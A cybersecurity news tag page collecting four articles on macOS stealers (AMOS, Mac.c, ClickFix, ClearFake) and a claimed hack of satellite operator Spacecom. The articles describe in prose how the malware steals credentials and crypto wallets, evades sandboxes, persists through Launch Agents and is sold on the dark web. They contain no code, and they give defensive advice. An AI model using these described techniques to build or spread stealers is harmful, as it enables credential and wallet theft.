CybserSecurity News

Tag: AMOS

  • The Terminal Trap: How the “ClickFix” Scam Tricks Mac Users into Self-Infecting with Data-Stealing Malware

    macOS users are once again being enticed by “simplistic remedies” for system optimization or disk purification, yet following such counsel may incur the steep price of compromised passwords, sensitive files, and cryptocurrency assets. Microsoft has alerted the public to a nascent surge in the ClickFix campaign, wherein adversaries disguise deleterious commands as benign instructional guides for Mac owners.

    Assailants disseminated these directives across bespoke websites, Medium blogs, and the Craft platform. These pages masqueraded as conventional troubleshooting resources, prompting users to transcribe a specific command into the Terminal and execute it. In reality, the command facilitated the retrieval and execution of malicious payloads, deploying data exfiltrators such as Macsync, Shub Stealer, AMOS, and various other malwares.

    Historically, analogous incursions frequently utilized .dmg disk images, necessitating that the victim manually mount and install the application. The current methodology, however, has become considerably more perilous; the command is executed directly via the Terminal, fetching a remote script and immediately facilitating its operation. This trajectory enables the malware to circumvent certain security scrutinies that macOS typically imposes upon applications launched through the Finder.

    Upon successful infection, the malware harvests credentials from browsers, macOS Keychain data, iCloud information, personal files, Telegram correspondences, and cryptocurrency wallet keys. In certain instances, the malicious code supplanted authentic Ledger Wallet, Trezor Suite, and Exodus applications with fraudulent iterations, ensuring the user continued to operate within a compromised environment.

    Microsoft delineates several iterations of this offensive. One variant initially scrutinized the keyboard language and terminated its operations upon detecting Russian or other CIS layouts. Another version sought a functional command-and-control server, attempting to retrieve a novel address via Telegram if the primary nodes remained unresponsive. A third iteration utilized “helper” or “update” files to detect virtual machine artifacts, ceasing its activities in environments resembling analytical sandboxes.

    To ensure persistence within the architecture, the perpetrators orchestrated macOS Launch Agents, masquerading them as legitimate Google or Finder components. Upon rebooting, the infected Mac would re-establish a connection with the adversary’s server to receive further mandates. The harvested data was subsequently archived and exfiltrated to a remote server, while temporary files were purged to obstruct forensic investigations.

    Apple has responded by refining its XProtect defenses, and within macOS 26.4, it introduced a specialized warning for hazardous Terminal inputs. Should a user attempt to paste a suspicious command, the system intercedes, cautioning that fraudsters frequently coerce such actions via websites, chats, applications, or telephonic solicitations.

    The fundamental counsel remains elementary: refrain from transcribing commands into the Terminal from websites or forums unless the source is beyond reproach. For the layperson, such a command appears as a cryptic sequence of characters, yet for an adversary, it represents a swift conduit to seizing passwords, data, and digital wealth.

  • Pro-Iranian Handala Group Claims Cyberattack on Israeli Satellite Operator Spacecom

    Israeli satellite operator Spacecom, which manages the AMOS satellite fleet, has found itself in turmoil after the pro-Iranian group Handala claimed to have compromised its infrastructure. The hackers published a statement on their darknet blog, a platform they routinely use to release stolen data.

    According to the attackers, they allegedly gained access to the company’s ground stations and exfiltrated hundreds of gigabytes of information. However, subsequent analysis casts doubt on whether the intruders obtained data that could endanger satellite control.

    Spacecom, with revenues estimated at around 100 million dollars, provides telecommunications services for both civilian and military purposes across Europe, the Middle East, and other regions. The AMOS fleet underpins communications and broadcasting, including through AMOS-17, whose clients were referenced in the leaked documents.

    The hackers claimed to have stolen 379 gigabytes of data, including files purportedly collected from ground stations in multiple countries. They also released what they described as personnel-related records. Among the published materials were screenshots of nondisclosure agreements between Spacecom and its clients.

    Experts at Cybernews, who analyzed a demo archive of approximately 960 megabytes, identified navigational and observational files in RINEX format — essentially satellite operation logs. While such data can assist in tracking current processes, they do not in themselves permit interference with satellite functions.

    Researchers noted that although the leak may contain material useful for phishing or other attacks targeting the company’s staff, there is no conclusive evidence of access to confidential systems governing satellite operations. Nevertheless, specialists advise Spacecom to promptly audit its infrastructure for vulnerabilities and close any potential security gaps.

    The Handala group is notorious for targeting Israeli and Western organizations. Its tactics resemble those of ransomware gangs, releasing data on its darknet site as leverage. Earlier this year, it also struck at Iran International, one of the few independent media outlets in Iran.

  • A New Mac Trojan Is on the Prowl, and It’s Cheaper Than Its Top Competitor

    A new macOS trojan, emerging on the dark web under the name Mac.c, is rapidly gaining popularity and beginning to compete with one of the underground market’s most notorious threats, AMOS. Analysts at Moonlock Lab were the first to draw attention to this tool, tracing its development by a hacker known as mentalpositive. Unlike many underground authors, he openly published updates and showcased the capabilities of his code on dark web forums — a move that quickly attracted buyers to the project.

    Mac.c was conceived as a streamlined alternative to AMOS, built for maximum speed in data exfiltration. The malware is capable of harvesting information from iCloud Keychain, stored browser passwords, cryptocurrency wallets, system metadata, and even documents from designated macOS directories. To achieve this, it leverages native macOS mechanisms — from AppleScript to standard APIs — enabling it to disguise itself as legitimate processes and bypass many antivirus solutions. Its discovered features include evasion of XProtect via unique build generation, a remote file grabber, and a phishing module for stealing Trezor seed phrases.

    Beyond its technical arsenal, the author invested in operator convenience. The administrative panel provides infection statistics, supports custom build generation, and enables attack management. As the project evolved, new integrations were introduced, including masquerading as Ledger Live, reducing binary size for faster delivery, and lowering detection rates during static analysis.

    The subscription price for Mac.c is $1,500 per month, with a standalone Trezor data theft module offered for $1,000. By comparison, AMOS costs at least $3,000 monthly, making Mac.c significantly more accessible — especially to less experienced or financially constrained cybercriminals, including so-called “traffers” who spread malware through phishing and malvertising campaigns.

    Moonlock Lab confirmed the full functionality of Mac.c, having detected its samples among CleanMyMac users. It spreads under the guise of installation files with names such as Installer.dmg or Installer descrakeador adobe.dmg, often pretending to be cracked versions of popular software. While CleanMyMac managed to block the threat, researchers emphasized that its detection highlights active distribution. A code comparison between Mac.c and AMOS revealed that some features were directly borrowed, suggesting possible ties between the developers.

    The attack chain relies heavily on social engineering: the victim downloads and launches a malicious file, triggering the first stage of the trojan. It then deploys AppleScript to search for sensitive data and spawns counterfeit system windows requesting a password. The credentials entered by the user are stored in plaintext and later used for further exploitation of system resources.

    The malware harvests cookies, logins, and IndexedDB contents from browsers such as Chrome, Edge, Brave, and Yandex. While Safari is not yet supported, the list of targeted applications is expanding. Mac.c places particular emphasis on cryptocurrency wallets, extracting data from MetaMask, Phantom, Binance Wallet, Electrum, Exodus, Atomic, Monero, Wasabi, and Ledger Live. An additional module even masquerades as the game Innocent Witches, prompting users for a password to “save files,” which instead redirects them to a phishing site (innocentwitches[.]top).

    Although Mac.c does not yet match the sophistication of AMOS, its lower cost and ease of use make it an especially dangerous threat. Moonlock Lab predicts its popularity will continue to grow, with future versions likely to incorporate expanded capabilities. Against the backdrop of rising attacks on cryptocurrency holders, Mac.c lowers the barrier to entry for a wider pool of cybercriminals seeking to profit from the theft of digital assets.

    For protection, researchers advise downloading applications exclusively from trusted sources, avoiding suspicious links, keeping macOS updated, and deploying specialized security tools. Cryptocurrency holders are urged to store keys and assets on hardware wallets or in secured applications rather than within browsers.

    Mac.c serves as a stark reminder that macOS can no longer be considered an invulnerable system. With active backing from the dark web community and a comparatively modest price, it may fuel a new wave of cyberattacks — with digital currencies once again as the prime target.

  • Atomic Stealer Malware Now Targets Mac Users Through Fake Browser Updates

    Atomic Stealer, also known as AMOS, is a popular stealer for Mac OS. In September, security researchers from Malwarebytes described how malicious ads were tricking victims into downloading this piece of malware under the disguise of a popular application.

    Now, AMOS is being delivered to Mac users via a fake browser update chain tracked as ‘ClearFake’. This may very well be the first time we see one of the main social engineering campaigns, previously reserved for Windows, branch out not only in terms of geolocation but also operating systems.

    The latest vector for Atomic Stealer’s distribution is a campaign dubbed ‘ClearFake’. Initially, a tactic primarily used against Windows users, ClearFake has now extended its reach, targeting Mac users through a fake browser update chain. This marks a significant shift in social engineering campaigns, expanding not only in geographical scope but also across operating systems.

    ClearFake operates by leveraging compromised websites to distribute phony browser updates. Discovered by Randy McEoin in August, this campaign has undergone several enhancements, including the adoption of smart contracts for its redirect mechanism. It has quickly become one of the most prevalent and dangerous social engineering schemes.

    On November 17, security researcher Ankit Anubhav noted that Mac users were now being targeted by ClearFake, with a tailored payload. This payload, a DMG file posing as a Safari or Chrome update, is crafted to deceive Mac users. Once the file is opened, and administrative permissions granted, it executes commands that enable the theft of passwords and files.

    ClearFake employs a high level of deception, using templates that mimic official websites. For Safari, the template closely resembles Apple’s official site, available in various languages. For Google Chrome users on Mac, the template is akin to the one used for Windows users, maintaining a consistent deceptive appearance.

    ClearFake

    An analysis of the malicious application reveals strings that indicate its capabilities, including password and file grabbing. Additionally, the malware’s command and control server, where the stolen data is sent, can be identified within the same file.

    Historically, fake browser updates have predominantly been a threat to Windows users. However, the popularity of stealers like AMOS has made adapting payloads to different operating systems, including MacOS, more feasible for threat actors. This shift signals an increase in the threat landscape for Mac users, who might have previously considered their systems less susceptible to such attacks.

    Given the rise of ClearFake as a primary social engineering campaign, Mac users are advised to exercise increased vigilance. Malwarebytes recommends the use of web protection tools to block the malicious infrastructure associated with this threat actor. As the tactics of cybercriminals evolve, staying informed and employing robust cybersecurity measures are key to safeguarding against such sophisticated threats.